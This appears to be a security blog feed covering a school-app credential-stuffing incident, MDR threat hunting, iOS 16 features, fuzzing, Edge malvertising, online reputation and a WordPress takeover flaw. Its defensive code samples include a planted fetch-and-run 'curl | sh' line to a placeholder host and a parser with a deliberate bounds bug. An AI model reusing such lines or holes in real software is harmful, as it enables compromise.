
School app Seesaw compromised to send shock NSFW image

On Wednesday, parents and teachers reported that the student learning platform Seesaw had been hacked after some users received an infamous explicit image known as “goatse” in private chats. Schools in districts in Colorado, Illinois, Kansas, Michigan, New York, Oklahoma, South Dakota, and Texas experienced the same thing and began sending out warnings to families.

San Francisco-based Seesaw, which prides itself on having more than 10 million users, declined to comment on how many were affected.

In a news release, Seesaw said it wasn’t hacked but was compromised via “a coordinated ‘credential stuffing’ attack” in which widely available compromised credentials—email address and password combinations—were used to illegally take over Seesaw accounts.

“We have no evidence that the attacker performed additional actions in Seesaw beyond logging in and sending a message from these compromised accounts,” the notification said.

In an update, Seesaw said it has removed the inappropriate link, which is a bit.ly shortened URL, and undertook other actions to make sure that no one can access the link anymore.

“However, in a few instances, if the message was already loaded in a web browser or one of our apps, the message may have been cached on your device,” it added. “To ensure that no one has access to the inappropriate message, we recommend everyone *refresh their web browsers and refresh their mobile apps*. On mobile, you can update your device to the latest app version (version 8.1.2, released today) and re-launch Seesaw OR close and re-open the Seesaw app.”

Seesaw has since adjusted its detection and blocking rules and is gradually restoring the app’s messaging feature, which it temporarily disabled while it dealt with the compromise.

Say ‘no’ to password reuse

The Seesaw incident is a timely example of why it’s important not to reuse passwords across accounts. When one site is breached, the stolen email and password pairs are sold on to other criminals, who replay them against unrelated sites; every account that shares the same password falls with it.

To eradicate password reuse forever, get yourself a password manager to create and remember unique, complex passwords. All you need is one very long and very complicated password for the password manager itself—you can combine random words or think of a ridiculous phrase that is unguessable. 

Seesaw pointed its users to CISA’s (Cybersecurity & Infrastructure Security Agency) guidance on creating and managing passwords. Parents, teachers, and guardians would do well to read it too.

Stay safe!

Cyber threat hunting for SMBs: How MDR can help

When you hear the words “cyber threat hunting”, you just may picture an elite team of security professionals scouring your systems for malware. Sounds like something only huge businesses or nation states would need to do, right?

Not quite. Threat hunting is just as essential for small and medium-sized businesses (SMBs) as it is for larger organizations, for the simple reason that threat actors see SMBs as an easy way to make a quick buck.

Cybercriminals know that most SMBs don’t have the budget for robust cybersecurity technology or seasoned security professionals. And when attackers strike, it stings: In 2021, the average cost of a data breach for businesses with fewer than 500 employees was $2.98 million.

Threat hunting can weed out malware before anything bad like a data breach can happen. Unfortunately, cyber threat hunting is more difficult for SMBs to do than it is for large organizations due to the aforementioned resource constraints. That’s where Managed Detection and Response (MDR) can help. 

In this article, we’ll review what MDR and threat hunting are, and how exactly MDR can help SMBs with cyber threat hunting.

What is cyber threat hunting?

Consider that when a threat actor breaches a network, they rarely act right away. The median time between system compromise and detection is 21 days.

By that time, it’s often too late. Data has been harvested or ransomware has been deployed. In fact, 23% of intrusions lead to ransomware, 29% to data theft, and 30% to exploit activity—when adversaries use vulnerabilities to initiate further intrusions.

Threat hunting is all about nipping these sorts of stealthy attackers in the bud. And not only dormant attackers, but dormant malware too.

Threat hunting arrived on the scene as an important security practice with the increased prevalence of unidentifiable or highly-obfuscated threats—those that quietly lurk in the network, siphoning off confidential data and searching for credentials to access the “keys to the kingdom.”

The bad news for SMBs: Manually intensive and costly threat-hunting tools usually restrict this practice to larger organizations with an advanced cybersecurity model and a well-staffed security operations center (SOC). That’s where MDR comes in.


What is MDR?

Managed Detection and Response, or MDR, is a service that provides around-the-clock monitoring of an organization’s environment for signs of a cyberattack. Using a combination of Endpoint Detection and Response (EDR) technology and human-delivered security expertise, an MDR service provides advanced attack prevention, detection, and remediation, as well as targeted and risk-based threat hunting. 

The core service capabilities of MDR include:

  • 24×7 monitoring of an organization’s environment for threats.

  • Threat detection, alerting, and response from highly experienced security analysts.

  • Correlation of endpoint alerts with other data sources to identify threats and response measures more effectively.

  • Proactive cyber threat hunting based on past (and newly reported) indicators of compromise (IOCs).

So, as you can see, MDR is much, much more than just threat hunting.

While it’s technically possible for SMBs to build their own MDR program in-house, doing so takes the time, money, and effort of standing up an entirely new IT security department: you’d need your own SOC facilities, a minimum of five full-time analysts to provide 24/7 coverage, and so on. That’s why many SMBs outsource MDR to a service provider.

In short, MDR is a service designed to protect an organization’s data and assets even if a threat eludes EDR detection. Outsourcing MDR removes the capital expenditure (CapEx) of buying a SIEM or other security tools and lets an SMB start addressing its security needs immediately.

Cyber threat hunting and MDR

Now, let’s bring this thing full circle: what does threat hunting for SMBs look like as a managed service? 

Threat hunting typically includes two essential functions in the delivery of MDR services. The first one is research-based threat hunting where security analysts look, or “hunt,” for known attackers or adversarial behaviors listed in threat intelligence services.

“Let’s say we get our intelligence and it says listen, if you see these five files with this hash, it’s most likely this attack. Because we understand the tools, tactics, and motives of the adversary, we can say oh, look, we just found one of those five files,” says Bob Shaker, VP, Managed Services at Malwarebytes.

“We know they’re trying to steal certain types of data. I’m gonna go look and see if that data is being exfiltrated. And there it is. There’s a folder created and all the data is being copied into this folder. This is that attack.”

The second approach is active threat hunting, where security analysts systematically review your organization’s environment to uncover suspicious activity that is currently in progress or newly emerging IOCs.

Shaker explains this second approach: “Here’s how it works: Intelligence and data comes into the MDR team. The team creates playbooks that execute against the customers’ environment, looking at the EDR data that’s been collected for one of those indicators of compromise.”

“When an IOC is found in the EDR data, the analyst takes the next step to investigate wherever it was found to determine if it’s an attack or not. If not, they mark it as a false positive. And if it is, they take whatever the appropriate steps are that the customer allows them to take. Then they notify the customer with potential remediation actions, such as deletion, quarantine, blocking, and the customer chooses.”
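Research-based hunting as Shaker describes it, sweeping a host for files whose hashes appear in a threat-intelligence feed, looks roughly like the following. This is an added example and not Malwarebytes’ tooling; the IOC feed, the sample file contents and the directory tree it plants are all constructed for the demonstration (the hashes are of made-up bytes, not real malware). It computes MD5, SHA-1 and SHA-256 in one pass because intelligence feeds rarely agree on which algorithm they publish.

```python
import hashlib
import os
import tempfile
from typing import Dict, Iterator, List, Tuple

# Constructed intelligence: "if you see these files with these hashes, it is
# most likely this attack".  The bytes below are invented for the example.
SAMPLE_DROPPER = b"MZ\x90\x00constructed-dropper-bytes-for-the-example\x00"
SAMPLE_LOADER = b"#!/bin/sh\n# constructed loader stub\ncurl -s http://example.invalid | sh\n"

IOC_FEED: Dict[str, str] = {
    hashlib.sha256(SAMPLE_DROPPER).hexdigest(): "ExampleGang dropper",
    hashlib.md5(SAMPLE_LOADER).hexdigest(): "ExampleGang loader",
}


def hash_file(path: str) -> Dict[str, str]:
    """Return md5/sha1/sha256 of a file from a single chunked read."""
    hashers = {"md5": hashlib.md5(), "sha1": hashlib.sha1(), "sha256": hashlib.sha256()}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            for h in hashers.values():
                h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def walk_files(root: str) -> Iterator[str]:
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            yield os.path.join(dirpath, name)


def hunt(root: str, feed: Dict[str, str] = IOC_FEED) -> List[Tuple[str, str, str]]:
    """Return (path, algorithm, intel label) for every file whose hash is in the feed."""
    hits = []
    for path in walk_files(root):
        try:
            digests = hash_file(path)
        except OSError:
            continue  # unreadable file: skip it, never abort the sweep
        for algo, digest in digests.items():
            label = feed.get(digest.lower())
            if label:
                hits.append((path, algo, label))
    return sorted(hits)


def plant_sample_tree(root: str) -> None:
    """Write a constructed tree: two IOC matches and two benign files."""
    os.makedirs(os.path.join(root, "users", "alice", "downloads"), exist_ok=True)
    os.makedirs(os.path.join(root, "tmp"), exist_ok=True)
    files = {
        os.path.join(root, "users", "alice", "downloads", "invoice.exe"): SAMPLE_DROPPER,
        os.path.join(root, "tmp", ".x"): SAMPLE_LOADER,
        os.path.join(root, "users", "alice", "notes.txt"): b"benign text\n",
        os.path.join(root, "tmp", "cache.bin"): b"\x00" * 100,
    }
    for path, content in files.items():
        with open(path, "wb") as fh:
            fh.write(content)


def demo() -> List[Tuple[str, str, str]]:
    """Plant the constructed tree in a temp directory and hunt it."""
    root = tempfile.mkdtemp(prefix="hunt-demo-")
    plant_sample_tree(root)
    return hunt(root)


if __name__ == "__main__":
    for path, algo, label in demo():
        print(f"HIT {label} ({algo}) at {path}")
```

In an MDR setting the same lookup runs against hashes already collected by the EDR agent rather than by re-reading every file, but the logic, and the decision that a hit is an investigation lead rather than a verdict, is the same.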

Shaker further notes that, if a threat slips through the cracks of your MDR provider and an attack is successful, then there’s nothing your MDR can do anymore. The point of MDR is to do everything it can to stop the threat at the point of attack: after that, your incident response company takes over.

SMBs need cyber threat hunting—and MDR can help them do it 

Threat hunting is essential for small and medium-sized businesses, as attackers can remain undetected for weeks after compromising a network (a median of 21 days, as noted above).

Unfortunately, threat hunting is complicated and requires a dedicated SOC and seasoned cybersecurity staff, barring most SMBs from utilizing this important security practice. In this article, we’ve outlined how outsourcing your threat hunting to an MDR service can help.

Want to learn more about MDR and threat hunting? Check out the resources below. 

Featured articles 

What is Threat Hunting?

What is Threat Intelligence?

What is MDR?

What is SIEM?

What is SOC?

Webinar: Malwarebytes EDR Product Demo

Here are the new security and privacy features of iOS 16

On Monday, September 12, Apple released iOS 16, which included a host of new security and privacy features.

Let’s look at what these are—and some quality-of-life (QoL) changes. 

Lockdown Mode

As Macrumors calls it, Lockdown Mode is an “extreme” security setting ideal for those who regularly find themselves in the crosshairs of online risk and targeted sophisticated cyberattacks: Activists, journalists, and government officials.

Although this mode was made with a small fraction of iPhone users in mind, anyone can enable and use it.

Lockdown Mode disables or strictly limits many iPhone features. Turning it on requires restarting the device and entering your passcode. Once enabled, it blocks (among other things) most message attachments, FaceTime calls from people you have never called before, and wired connections to other devices while the iPhone is locked.

Passkey

As we mentioned earlier this week, passkeys are a “password killer” and are used instead of passwords to sign in to a website or app. It may seem complicated if you dig into the details, but in practice it may be as simple as using Face ID or Touch ID.

Passkeys aim to help protect users from phishing attacks, malware, and other campaigns designed to steal accounts or unlawfully gain access to them.

Clipboard consent

Pasting content that another app placed on the clipboard now requires explicit permission from the user: when an app reads the clipboard, iOS prompts for consent, much as it does when an app asks for access to the camera, microphone, or other sensitive data.

Known Wi-Fi networks editing

Here’s another handy feature that makes users aware of all the Wi-Fi networks they have previously connected to so they can properly disconnect or forget that connection, even when they’re not in range of the network anymore. Users can also view details about these networks.

Not only that, if iCloud Keychain is enabled on all your Apple devices, users will also see a listing of Wi-Fi hotspots those devices have connected to in the past. This listing is under Known Networks, which you can navigate to from Settings > Wi-Fi > Edit.

It’s important to clear out old Wi-Fi hotspot connections so your device won’t auto-join them in future, especially open hotspots or ones whose owner still uses the same weak password: anyone who sets up an access point with the same name (and password, if there is one) can lure your device onto it.

Rapid security response

Software updates are essential; with exploits circulating for so many known bugs, nobody can afford to leave software unpatched. Apple has made it easier for iPhone users to apply security fixes without installing a whole OS update, which also makes those downloads quicker.

Users have the option to turn this feature on or off.

Safety Check

Safety Check is a new feature under Settings. If users want to reset the data and location access they have granted to apps and other people, they can do so from here in a few taps.

This feature is not just for general privacy reasons; it is also aimed at people in complicated or abusive relationships, especially those with violent partners. A “Quick Exit” button takes the user straight back to the iPhone’s Home screen in case they don’t want to be caught using Safety Check.

Safety Check has two options: Emergency Reset and Manage Sharing & Access. The former instantly stops information sharing with all people and apps with one tap. It also removes all emergency contacts and lets you review and reset your Apple ID account details, such as your password.

The latter, Manage Sharing & Access, gives you a bird’s-eye view of what data you’re sharing, with whom, and with which apps. If you think someone is secretly tracking or monitoring you, this is where to check. You can cherry-pick what data to share with whom, or stop sharing with particular people or apps altogether.

Face ID

Face ID is a staple on iOS, but some Apple fans may find it a tad annoying to use it only in portrait orientation. This is no longer the case for those using iPhone 13 and above. They can now use Face ID in either portrait or landscape orientation after updating to iOS 16.

Overall, it appears Apple has attempted to cover as much ground as possible. Some new features, unrelated to security or privacy, like Live Captions, are aimed at deaf and hard-of-hearing users.

You can read more about iOS 16’s new features on this page.

Explained: Fuzzing for security

Fuzzing, or fuzz testing, is defined as an automated software testing method that uses a wide range of invalid and unexpected data as input to find flaws in the software undergoing the test.

The flaws do not necessarily have to be security vulnerabilities. Fuzzing can also bring other undesirable or unexpected behavior of the software to light. But it’s good to realize that bugs discovered through fuzzing account for the majority of new CVE entries.

The purpose

Ensuring software quality is becoming more essential, but sometimes collides with deadlines, complex software engineering, and dependencies on other software. As such, fuzzing has become part of the quality assurance (QA) procedure before software is released. But it doesn’t stop there. After the release, the number of testers might go up, but not every one of them will be doing it for your benefit.

Fuzzing is particularly useful for exposing potential security vulnerabilities like:

  • Memory leaks. A memory leak occurs when a program mismanages memory allocations so that memory which is no longer needed is never released. Leaks slow the system down until the process, or the whole system, crashes. Closely related, and the classic fuzzing find in C and C++ code, are memory corruption bugs such as buffer overflows and use-after-free; running the target under a tool like AddressSanitizer makes those visible the moment they happen rather than only when they eventually cause a crash.
  • Control flow errors and other runtime errors. A control flow error is an erroneous jump in an executing program, triggered from outside by the input it receives. Runtime error is an umbrella term for any error that occurs during execution of a program.
  • Race conditions. A race condition, or race hazard, is behavior whose outcome depends on the sequence or timing of events the program does not control. It becomes a bug when events do not happen in the order the programmer intended.

All of these bug classes become exploitable when the outcome is reasonably predictable and can be turned to the attacker’s advantage. The goal of fuzzing for bug bounty hunters is to induce unexpected behavior in an application and see whether it leads to an exploitable bug.

Input types

The idea behind fuzzing is to release different types of input and look for hiccups. A crash or other strange behavior may mean that you are on to something. After the test you can repeat the input that caused the abnormality and test similar types of input to work out what might be the underlying reason. Causing unexpected behavior is only the first step when you are working out a vulnerability.

An application may have more than one attack surface. Input can reach it in several ways: through the graphical user interface (GUI), through command line options, or through malformed or specially crafted files it is asked to open. Each of these is a place to fuzz.

Web applications

The software undergoing the fuzzing can also be a web application. Web application fuzzing is mostly used to expose common web vulnerabilities, like injection issues, cross-site scripting (XSS), and more. When testing live web applications, keep in mind that you want to test the application itself, not the infrastructure it runs on: throttle your request rate so regular users are not affected.

Test types

At face value fuzzing sounds like throwing the kitchen sink at an application and seeing what sticks, but even fully automated methods are more effective with some preparation. The input used to fuzz an application can be crafted for a specific purpose or randomly generated; either way it helps to exclude input types you already know the application will not accept.

A common approach to fuzzing is to define lists of values that have a bigger chance of raising an issue (fuzz vectors) for each type. These can be extremes, like very large numbers, or known issues from similar applications, like escaped characters or Structured Query Language (SQL) commands.
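An added example (not from the original article) of the approach just described: a small mutation fuzzer in Python that first sweeps a list of boundary-value fuzz vectors over every byte of each seed input, then applies random mutations, and treats any exception other than the parser’s own rejection as a crash. The target `parse_record` is a constructed toy parser with a deliberate missing bounds check; the fuzzer also reduces each crashing input to a minimal reproducer, which is the “repeat the input that caused the abnormality” step from earlier in the article.

```python
import random
from typing import Callable, Dict, List, Optional, Tuple

Target = Callable[[bytes], object]


# Constructed fuzz target: a toy record parser with a deliberate bounds bug.
# Format: b"RC" + count (1 byte) + count * (length (1 byte) + payload).
def parse_record(data: bytes) -> List[bytes]:
    if len(data) < 3 or data[:2] != b"RC":
        raise ValueError("rejected: bad header")  # a clean rejection, not a bug
    count, body, pos, fields = data[2], data[3:], 0, []
    for _ in range(count):
        flen = body[pos]  # BUG: pos is never checked against len(body)
        fields.append(bytes(body[pos + 1:pos + 1 + flen]))
        pos += 1 + flen
    return fields


SEEDS = [b"RC\x02\x03abc\x01x", b"RC\x01\x05hello"]
FUZZ_VECTORS = [0x00, 0x01, 0x7F, 0x80, 0xFF]  # boundary values for one-byte fields
EXPECTED = (ValueError,)  # exceptions that mean "input rejected", not "bug"


def run_once(target: Target, data: bytes) -> Optional[str]:
    """Return the exception class name if the input crashed the target, else None."""
    try:
        target(data)
    except EXPECTED:
        return None
    except Exception as exc:  # anything unexpected counts as a crash
        return type(exc).__name__
    return None


def mutate(data: bytes, rng: random.Random) -> bytes:
    """One random 'havoc' mutation: bit flip, fuzz-vector overwrite, insert or delete."""
    buf = bytearray(data)
    op = rng.randrange(4)
    if op == 0 and buf:
        buf[rng.randrange(len(buf))] ^= 1 << rng.randrange(8)
    elif op == 1 and buf:
        buf[rng.randrange(len(buf))] = rng.choice(FUZZ_VECTORS)
    elif op == 2:
        at = rng.randrange(len(buf) + 1)
        buf[at:at] = bytes(rng.randrange(256) for _ in range(rng.randrange(1, 8)))
    elif len(buf) > 1:
        at = rng.randrange(len(buf))
        del buf[at:at + rng.randrange(1, len(buf) - at + 1)]
    return bytes(buf)


def fuzz(target: Target, seeds: List[bytes], iterations: int = 1000,
         seed: int = 0) -> List[Tuple[bytes, str]]:
    """Stage 1 sweeps every fuzz vector over every byte of every seed; stage 2
    applies random mutations.  Returns unique (input, exception name) pairs."""
    rng = random.Random(seed)
    crashes: Dict[bytes, str] = {}

    def check(data: bytes) -> None:
        name = run_once(target, data)
        if name and data not in crashes:
            crashes[data] = name

    for s in seeds:
        for pos in range(len(s)):
            for v in FUZZ_VECTORS:
                buf = bytearray(s)
                buf[pos] = v
                check(bytes(buf))
    for _ in range(iterations):
        check(mutate(rng.choice(seeds), rng))
    return list(crashes.items())


def minimize(target: Target, data: bytes, exc_name: str) -> bytes:
    """Greedy one-byte-at-a-time reduction that keeps the same crash class,
    so the reproducer handed to developers is as small as possible."""
    changed = True
    while changed:
        changed = False
        for i in range(len(data)):
            cand = data[:i] + data[i + 1:]
            if run_once(target, cand) == exc_name:
                data, changed = cand, True
                break
    return data


if __name__ == "__main__":
    for crash_input, name in fuzz(parse_record, SEEDS):
        print(name, crash_input, "->", minimize(parse_record, crash_input, name))
```

The split between “rejected” and “crashed” is the part worth copying: a parser that says no to bad input is doing its job, and counting those as findings buries the real bugs.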

Rules of engagement

Note that many applications take exception to uninvited penetration testing. Check if the developer or owner of the software you want to scrutinize has a bug bounty program and read the guidelines to participate. Depending on which country you live in, and where the software owner resides, you could be breaking the law if you don’t follow the rules.

Existing fuzzing software

Below are some interesting leads if you want to find more in-depth information about fuzzing.

OSS-Fuzz is a fuzzing platform to make open source software more secure and stable. It was launched by Google as a response to the Heartbleed vulnerability. To be accepted to OSS-Fuzz, an open-source project must have a significant user base and/or be critical to the global IT infrastructure. Since its launch, OSS-Fuzz has become an important service for the open source community, helping get more than 8,000 security vulnerabilities and more than 26,000 other bugs in open source projects fixed.

One of the best-known tools that includes a fuzzer is Burp Suite, whose Intruder component sends payload lists like those described above at chosen positions in a web request. Burp Suite is powerful out of the box, but it can grow with you as you become more experienced. The professional version offers the opportunity to integrate automated and semi-automated processes with manual tooling. If you are starting out or want to try it first, there is a Community Edition, or you can trial the Professional version for 30 days.

Another web app scanner which is certainly worth mentioning is OWASP ZAP. OWASP Zed Attack Proxy (ZAP) is a free, open-source penetration testing tool maintained under the umbrella of the Open Web Application Security Project (OWASP). ZAP is designed specifically for testing web applications, and is both flexible and extensible. At its core, ZAP is what is known as a machine-in-the-middle proxy. It stands between the tester’s browser and the web application so that it can intercept and inspect messages sent between the two, modify the contents if needed, and then forward them on to their destination.

OWASP ZAP in action

Many other free fuzzing tools can be found if you search for them, and some are really useful for specific purposes, but you should keep in mind that most of them require an advanced knowledge level before you can expect any useful results. Many are command line tools and/or require you to have Python installed.

Even then it can be a steep learning curve, but it is one that is well worth it, in my opinion. Let us know your experiences in the comments, below.

Malvertising on Microsoft Edge’s News Feed pushes tech support scams

While Google Chrome still dominates as the top browser, Microsoft Edge, which is based on the Chromium source code, is gradually gaining more users. Perhaps more importantly, it is the default browser on the Microsoft Windows platform and as such some segments of its user base are of particular interest to fraudsters.

We have tracked and observed a malvertising campaign on the Microsoft Edge News Feed used to redirect victims to tech support scam pages. The scheme is simple and relies on threat actors inserting their advertisements on the Edge home page and trying to lure users with shocking or bizarre stories.

In this blog post, we raise awareness and expose this scam operation that has been going on for at least two months.

Overview

The Microsoft Edge News Feed is a collection of thumbnails alternating between news content, traffic updates and advertisements. We have identified several ads that are malicious and redirect unsuspecting users to tech support scams.

The redirection flow is: an ad thumbnail on the Edge News Feed, a click handled by the Taboola ad network, a scammer-controlled domain that fingerprints the visitor, and finally either a browser locker page (for targeted visitors) or a harmless page (for everyone else).

Technical details

When a user clicks one of the malicious ads, a request is made to the Taboola ad network API (api.taboola.com) to register the click on the ad banner. The server responds with the next URL to load, in the following format:

document.location.replace('https://[scammer domain]/{..}/?utm_source=taboola&utm_medium=referral

The first request to one of those malicious domains retrieves a Base64-encoded JavaScript whose job is to inspect the current visitor and decide whether they are a potential target.

An original version of this script can be found here, while a beautified version can be found here.

The script’s purpose is to show the malicious redirection only to potential victims; bots, VPN users, and visitors from geolocations that are not of interest are instead shown a harmless page related to the advert.

The scheme tricks users with fake browser locker pages, a well-worn technique among tech support scammers. What’s worth noting is the cloud infrastructure being leveraged, which makes it very difficult to block.


The browser locker pages are hosted on subdomains of ondigitalocean.app that change constantly; in the span of 24 hours, we collected over 200 different hostnames.

Infrastructure

The advertisements displayed on the Edge News Feed are linked with the following domains (this list is not exhaustive):

  • feedsonbudget[.]com
  • financialtrending[.]com
  • foddylearn[.]com
  • glamorousfeeds[.]com
  • globalnews[.]cloud
  • hardwarecloseout[.]com
  • humaantouch[.]com
  • mainlytrendy[.]com
  • manbrandsonline[.]com
  • polussuo[.]com
  • newsagent[.]quest
  • newsforward[.]quest
  • puppyandcats[.]online
  • thespeedoflite[.]com
  • tissatweb[.]us
  • trendingonfeed[.]com
  • viralonspot[.]com
  • weeklylive[.]info
  • everyavenuetravel[.]site

One of the domains, tissatweb[.]us, which has also been publicly reported for hosting a browser locker, has interesting whois data:

Registrant Email: sumitkalra1683@gmail[.]com

That email address is associated with the following additional domains:

  • tissat[.]us
  • mvpconsultant[.]us
  • aksconsulting[.]us
  • furnitureshopone[.]us
  • minielectronic[.]in
  • antivirusphonenumber[.]org
  • quickbooktechnicalsupport[.]org
  • printertechnicahelp[.]com
  • comsecurityessentials[.]support
  • decfurnish[.]com
  • netsecurity-essential[.]com
  • mamsolutions[.]us
  • mamsolution[.]us
  • a-techsolutions[.]us

The email address belongs to an individual named Sumit Kalra who is listed as a director for Mws Software Services Private Limited, a company located in Delhi whose principal business activity is “Computer and related activities”.

Protection

This particular campaign is currently one of the biggest we are seeing in terms of telemetry noise.


The fingerprinting to avoid detection is interesting and more sophisticated than usual. We will continue to expose and report abusive infrastructure used for scams.

Malwarebytes users were already protected against this tech support scam thanks to our Browser Guard extension.

How to help your child manage their online reputation

Whether your child has been socially active online for a while now or you just handed your young one their first ever smartphone, now is an excellent time to think about managing their online reputation.

The concept may sound overwhelming, but doing it is easy. Since you’re no doubt talking to your kids about how to keep themselves safe online, you might as well open up about online reputations and how to create or maintain a positive one.

What’s an online reputation?

An online reputation is the sum of what you post online about yourself and what other people post about you. Essentially, it’s your child’s online presence as seen from the point of view of other people. Your child must understand what they should and shouldn’t share online, whether publicly on social media or privately in chat.

It’s equally crucial for your child to understand that what they do online can adversely affect others and themselves offline.

Why should your child manage their online reputation?

In principle, managing a personal online reputation is similar to how businesses manage theirs. Business owners know the value of having a good reputation online—it opens up excellent business opportunities, and increases trust and loyalty of the brand.

A positive reputation matters to individuals, too. Without one, people can miss out on jobs they want or be turned away from good schools, among other things. The first scenario is particularly real, since employers often check applicants’ social accounts as part of the hiring process to get a glimpse of who they are.

Online reputation management 101

Here are some lines of conversation you can use to help kids learn about managing their online reputation:

Think before you post

A pre-teen or a teen may already know about this, but it’s essential to keep driving this home. Once something is on the internet, it can’t be fully taken back, even if it’s deleted. If in doubt, don’t post it.

There’s a story of one Twitter user who got accepted at the most coveted NASA internship. But because a tweet contained vulgar language and “NASA” was hashtagged, a former NASA engineer saw the tweet and commented on the language this user used. NASA eventually canceled the internship.

Private things should stay private, but sometimes they don’t

While one should be careful about what they post online in public, your kid should also know what not to post or share in private. 

Stress that just because they post something privately doesn’t mean it’ll remain private. Secrets get passed on, accounts get hacked, and online repositories get breached, leaking sensitive data. It’s best not to share something you don’t want millions of internet users to see.

Carolyn Bunting, CEO of Internet Matters, an organization that aims to teach parents on how to keep their children safe online, says it best: “A good general rule when it comes to content is the T-shirt test—if you wouldn’t wear it on a T-shirt, then don’t post it online.”

Err on the side of caution. We’ve heard countless stories of inappropriate images being passed around because someone decided to trust their partner with their sensitive photos.

Be positive with how you conduct yourself online

Agree with your child that, to the best of their abilities, they will:

  • Be respectful of others.
  • Be kind and helpful.
  • Stick to the rules.

We teach our kids these rules when navigating the real world, and the same rules should apply online.

This is also an excellent opportunity to talk to them about the many personas they might encounter online. The most notable are the bully, the troll, and the groomer. 

Tell them to block a user and report them to the site if they see bullying, trolling, or grooming behavior. This isn’t just for social media: blocking and reporting applies to the video gaming communities your child is part of as well.

Search yourself

It’s safe to assume that everyone who uses the internet has entered their name into a search engine at least once.

Searching your child’s name is a good way to check what people have said about them across multiple social media posts. You can also search for their email address, account usernames, and phone numbers to see if these have made their way into some corner of the internet. And make this a regular thing.

If, say, an email address ends up in a list of leaked data that you or your child is not aware of, you now know they need to change their password and (perhaps begrudgingly) enable two-factor authentication (2FA).

Let’s make it right

We all make mistakes, and we often believe such mistakes will continue to haunt our online lives. Because the internet never forgets—or at least that’s what the adage says.

To a degree that is true, as some organizations keep data about all of us with no deadline for deletion. But many internet users can now ask to be forgotten (in the EU, for example, under the GDPR’s right to erasure). There’s a lot of reading and understanding involved in this subject, so make sure you and your child understand their rights and how to submit a request.

Your child’s past shouldn’t define their future. People eventually grow up. Their thoughts and feelings about certain things change, often for the better. So if there is anything online that shows embarrassing or compromising content about or from your child, make it right together by filing takedown requests.

Final thoughts

Every internet user has a sort of brand reputation, whether or not they are aware of this. The sooner you tell your kids about online reputation and the importance of having and maintaining a good one, the better they will be at leaving positive digital footprints online early on.

More than words, parents and guardians should also model the behavior. Thankfully, it’s never too late to start.

WPGateway WordPress plugin vulnerability could allow full site takeover

There have been a few WordPress plugin vulnerabilities in the wild recently, and today we have another one to add to the list. Sometimes when word breaks of a WordPress plugin issue, a fix is already available and all you have to do is update. On other occasions, the attack is live and doing damage with no fix yet available. Sadly, this one is an example of the latter.

WPGateway allows WordPress users to run WordPress sites from one dashboard. Unfortunately, research shows that part of this functionality puts both the site and the site’s users at risk.

Beware of rogue admins

The issue allows unauthenticated attackers to add rogue users to the site. Those unauthorized users have full admin privileges, which amounts to a full site takeover, courtesy of the plugin.

At that point, the attacker can do what they want with the hijacked website. They are in full control, which is not a great situation for anybody. The vulnerability is listed on the Common Vulnerabilities and Exposures site as CVE-2022-3180. However, no additional information is available yet, as the entry has merely been reserved at this point.

Active exploitation

The issue was first discovered on September 8, and is being actively exploited. There is very little additional information to go on at this point, as the specifics of the vulnerability are being withheld. As a result, people will largely be reliant on the WPGateway team to get a patch put together.

Detecting and avoiding compromise

Options are limited, but for now the main advice from Wordfence is this:

  • Remove the plugin installation until a patch is made available.

  • Check for malicious admin accounts in your WordPress dashboard. The username “rangex” is a common indicator of compromise.

You can also check site access logs for requests to: //wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp_new_credentials=1. This indicates an attack attempt was made, but does not mean your site has been compromised. This is why checking for the “rangex” username is so important. Fingers crossed that this issue will receive a speedy patch from the plugin developers.
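The two checks above can be scripted. The following is an added example (not Wordfence's or the plugin's code) that scans access-log lines for the request path quoted above and checks an exported user list for a “rangex” administrator; the log lines and user list are constructed for the example, and the WP-CLI command in the comment is an assumption about how you would export real users.

```python
"""Triage a WordPress site for the two WPGateway indicators described above:
probe requests to wpgateway-webservice-new.php?wp_new_credentials=1 in the
access log, and a rogue administrator account named "rangex"."""
import re
from urllib.parse import parse_qs

# Endpoint path from the public advisory. The leading "//" seen in the wild is
# normalised away before matching, so both "/wp-content/..." and "//wp-content/..." hit.
WPGATEWAY_ENDPOINT = "wp-content/plugins/wpgateway/wpgateway-webservice-new.php"
SUSPECT_USERNAMES = {"rangex"}

# Apache/nginx combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

def is_wpgateway_probe(url):
    """True when the request targets the vulnerable endpoint with wp_new_credentials=1."""
    path, _, query = url.partition("?")
    path = re.sub(r"/+", "/", path).lower()          # collapse "//" and ignore case
    if not path.endswith(WPGATEWAY_ENDPOINT):
        return False
    return parse_qs(query).get("wp_new_credentials", [""])[0] == "1"

def find_probe_attempts(log_lines):
    """Return source IP, timestamp and HTTP status of every probe request in the log."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and is_wpgateway_probe(m.group("url")):
            hits.append({"ip": m.group("ip"), "time": m.group("ts"), "status": int(m.group("status"))})
    return hits

def find_rogue_admins(users):
    """users: (user_login, role) pairs, e.g. exported with
    `wp user list --role=administrator --fields=user_login,roles` (assumed workflow)."""
    return sorted(u for u, role in users if role == "administrator" and u.lower() in SUSPECT_USERNAMES)

def triage(log_lines, users):
    """A probe alone means an attempt; a rogex admin means the attempt likely succeeded."""
    probes, rogue = find_probe_attempts(log_lines), find_rogue_admins(users)
    if rogue:
        verdict = "likely compromised"
    elif probes:
        verdict = "attack attempted, no rogue admin found"
    else:
        verdict = "no indicators found"
    return {"verdict": verdict, "probes": probes, "rogue_admins": rogue}

# Constructed sample data: one probe from 203.0.113.7 and a rogue "rangex" administrator.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Sep/2022:03:14:07 +0000] "POST //wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp_new_credentials=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Sep/2022:03:15:22 +0000] "GET /wp-login.php HTTP/1.1" 200 4211 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Sep/2022:03:16:01 +0000] "GET /wp-content/plugins/wpgateway/readme.txt HTTP/1.1" 404 196 "-" "curl/7.79"',
]
SAMPLE_USERS = [("editor_jane", "editor"), ("rangex", "administrator"), ("admin", "administrator")]

if __name__ == "__main__":
    print(triage(SAMPLE_LOG, SAMPLE_USERS))
```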

